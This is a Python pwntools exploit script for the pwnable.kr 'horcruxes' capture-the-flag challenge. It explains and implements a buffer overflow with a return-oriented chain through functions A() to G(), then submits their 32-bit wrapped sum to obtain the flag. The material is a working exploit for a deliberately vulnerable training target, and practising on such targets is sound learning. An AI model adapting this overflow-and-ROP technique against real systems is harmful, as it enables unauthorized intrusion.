"""
This pwn is about Return Oriented Programming (ROP).
In ROP we need to find the gadgets that, chained together, execute what we want.
In this challenge, instead of gadgets we search for horcruxes.
In the function ropme we need to execute all the functions from A() to G()
and then submit the correct sum to grab the flag.
The "your exp" input has a buffer overflow vulnerability, but we can't simply jump to the code that prints the flag:
that address contains the byte 0x0a ('\n'), so it cannot be delivered through the line-based input.
From Hopper or another disassembler you can get the addresses of the functions A() to G().
Send them in the right order after the offset in the "your exp" input.
Also append the address of the ropme call so it runs again; entering the correct sum on that second run yields the flag.
The sum must be computed the way the target does it, i.e. with 32-bit signed integer wrap-around.
"""
from pwn import *
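def _to_int32(value: int) -> int:
    """Reduce an arbitrary Python int to the 32-bit signed `int` the target computes.

    The target adds A()..G() as C ints, so their sum wraps at 2**32 and is
    interpreted as two's complement. The previous version subtracted INT_MAX
    (2**31 - 1) instead of 2**32 once the reduced value exceeded INT_MAX, and
    its `< INT_MIN` branch could never fire after the modulo, so any sum that
    overflowed was submitted wrong. This reproduces the C semantics exactly.

    Args:
        value: the Python-level (unbounded) sum of the reported EXP values.

    Returns:
        The value in [-2**31, 2**31 - 1] that a 32-bit signed add would yield.
    """
    value &= 0xFFFFFFFF
    if value >= 0x80000000:
        value -= 0x100000000
    return value


def exploit():
    """Run the ROP chain against pwnable.kr:9032 and print the server's reply (flag).

    Flow: menu option 1 leads to the overflowing "your exp" read in ropme().
    The payload fills the 116-byte buffer, overwrites the 4 saved bytes after
    it, then returns into A() .. G() in order and finally back into the call
    to ropme(), so a fresh prompt accepts the sum. Each A..G call prints an
    "EXP +<n>)" line; those are collected, summed with 32-bit signed
    wrap-around (see _to_int32) and sent as the answer to the second prompt.

    The addresses below were taken from the disassembly of this specific
    32-bit target build (see the module docstring); they are not portable.

    Raises:
        ValueError: if the chain contains 0x0a, which the target's line-based
            read would treat as end of input (the module docstring explains
            why the direct flag address is unusable for that reason).
    """
    con = remote('pwnable.kr', 9032)
    try:
        # Return into the ropme() call site so the sum prompt is shown again.
        ropme_call_addr = p32(0x0809fffc)
        # Entry points of A() .. G(); they must run in exactly this order.
        gadgets = [0x809fe4b, 0x809fe6a, 0x809fe89, 0x809fea8, 0x809fec7, 0x809fee6, 0x809ff05]
        packed_gadgets = b''.join(p32(gadget) for gadget in gadgets)
        # 116 bytes of filler, 4 bytes over the saved frame pointer, then the chain.
        payload = b'0' * 116 + b'\x00\x90\x90\x90' + packed_gadgets + ropme_call_addr
        # A newline anywhere in the chain would truncate it at the target.
        if b'\n' in payload:
            raise ValueError('ROP chain contains 0x0a; it would be cut short by the line-based read')
        con.sendline(b'1')
        con.sendline(payload)
        # One "EXP +<n>)" line per horcrux, A() through G().
        exps = [recv_exp(con) for _ in range(7)]
        exps_sum = _to_int32(sum(exps))
        # Second pass through ropme(): answer the sum prompt.
        con.sendline(b'1')
        con.sendline(str(exps_sum).encode('utf-8'))
        print(con.recvall().decode('utf-8'))
    finally:
        # Always release the socket, even if the server closes early or parsing fails.
        con.close()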
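def recv_exp(con) -> int:
    """Read the next "EXP +<n>)" report from the tube and return n as an int.

    Each of A()..G() prints a line ending in ``(EXP +<n>)``. The tube is
    consumed up to and including the newline of that line. int() is used
    for the conversion, so a value printed with a leading '-' parses too.

    Args:
        con: a pwntools tube (anything exposing recvuntil() and recvline()).

    Returns:
        The reported EXP value.

    Raises:
        ValueError: if the text between "EXP +" and ")" is not an integer.
    """
    # Bytes patterns: pwntools tubes speak bytes on Python 3.
    con.recvuntil(b'EXP +')
    line = con.recvline().strip()
    # Cut at the closing ')' rather than blindly dropping the last byte, so a
    # line that does not end exactly in ')' fails loudly in int() instead of
    # yielding a silently truncated number.
    number, _, _ = line.partition(b')')
    return int(number.decode('utf-8'))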
if __name__ == "__main__":
    # Script entry point: run the exploit only when executed directly.
    exploit()